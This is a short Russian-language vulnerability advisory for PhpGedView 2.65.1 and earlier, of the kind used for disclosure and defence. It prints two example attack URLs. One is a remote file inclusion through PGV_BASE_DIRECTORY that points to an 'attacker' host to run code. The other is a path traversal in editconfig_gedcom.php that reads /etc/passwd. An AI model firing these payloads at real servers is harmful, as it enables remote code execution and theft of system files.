Программа: PhpGedView 2.65.1 и более ранние версии 

Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. 

Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример: 

http://[target]/[phpGedView-directory ]/ index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=
http://attacker&THEME_DIR=/

Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.

Пример:

http://[target]/[phpGedView-directory]/ editconfig_gedcom.php?gedcom_config
=../../../../../../etc/passwd

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии